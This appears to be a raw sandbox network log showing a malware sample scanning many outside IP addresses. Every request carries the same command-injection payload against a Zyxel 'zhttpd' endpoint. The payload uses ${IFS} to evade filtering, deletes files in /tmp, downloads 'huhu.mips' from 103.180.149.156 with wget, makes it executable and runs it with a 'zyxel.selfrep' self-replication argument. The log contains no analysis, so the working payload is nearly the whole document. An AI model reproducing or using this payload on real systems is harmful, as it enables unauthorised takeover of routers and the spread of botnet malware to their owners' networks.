                                            Feb 2, 2024 06:21:12.619509935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4378192.168.2.1532904150.171.81.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619551897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4379192.168.2.1560068128.64.179.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619589090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4380192.168.2.1536614177.110.30.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.619596958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4381192.168.2.155988636.169.147.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.622950077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4382192.168.2.154790472.5.41.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.633924961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4383192.168.2.1557296128.122.207.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.633968115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4384192.168.2.1549836142.201.61.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634059906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4385192.168.2.154740687.170.219.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634084940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4386192.168.2.154184473.82.69.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634134054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4387192.168.2.1560806202.223.221.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634152889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4388192.168.2.1551534134.14.179.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634196997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4389192.168.2.153831481.7.108.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634227991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4390192.168.2.1553414191.51.80.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634301901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4391192.168.2.153397288.105.129.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634326935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4392192.168.2.1545734151.30.206.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634360075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4393192.168.2.1559046209.79.90.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634407043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4394192.168.2.1556308159.66.237.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634443998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4395192.168.2.1550458125.91.69.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634470940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4396192.168.2.1552376180.70.192.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634497881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4397192.168.2.1539196183.188.253.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634548903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4398192.168.2.1538702138.48.151.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634582043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4399192.168.2.153619012.17.164.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634624958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4400192.168.2.155098242.111.126.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634665966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4401192.168.2.1547670159.230.194.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634706020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4402192.168.2.1544890119.25.222.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634727001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4403192.168.2.1556338184.100.162.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634768963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4404192.168.2.1551494197.230.231.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634788990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4405192.168.2.153833438.165.32.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634852886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4406192.168.2.1533664198.100.185.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634875059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4407192.168.2.1548432117.194.58.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634921074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4408192.168.2.1555246185.162.224.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.634974003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4409192.168.2.153602885.209.27.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635024071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4410192.168.2.1541052113.238.195.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635035992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4411192.168.2.1535974169.146.66.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635078907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4412192.168.2.153778625.249.132.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635107994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4413192.168.2.156074437.132.176.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635137081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4414192.168.2.1548042190.107.0.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635200024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4415192.168.2.153962240.160.23.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635232925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4416192.168.2.154263078.138.104.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635251045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4417192.168.2.1549946162.187.165.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635298967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4418192.168.2.154422467.65.189.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635338068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4419192.168.2.1555532106.43.99.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635386944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4420192.168.2.154761460.254.110.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635402918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4421192.168.2.155709043.105.89.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635457993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4422192.168.2.1560484169.149.245.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635483980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4423192.168.2.154719697.189.125.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635520935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4424192.168.2.1555846204.121.172.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635543108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4425192.168.2.1554048185.36.232.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635612011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4426192.168.2.1552660108.101.55.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635621071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4427192.168.2.1542050134.215.108.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635668039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4428192.168.2.1552724119.137.50.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635710955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4429192.168.2.1554430117.163.220.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635746956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4430192.168.2.1537946132.23.83.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635777950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4431192.168.2.1560654111.153.69.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635832071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4432192.168.2.1542246125.183.62.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635878086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4433192.168.2.155395873.45.252.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635916948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4434192.168.2.1533362223.62.187.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635952950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4435192.168.2.154018264.201.109.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.635998011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4436192.168.2.1539398175.60.147.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636034012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4437192.168.2.1560154116.224.39.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636059999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4438192.168.2.1540246147.94.152.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636107922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4439192.168.2.1553818183.82.27.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636142015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4440192.168.2.155759288.126.54.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636183023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4441192.168.2.154467675.62.176.239443
                                            TimestampBytes transferredDirectionData
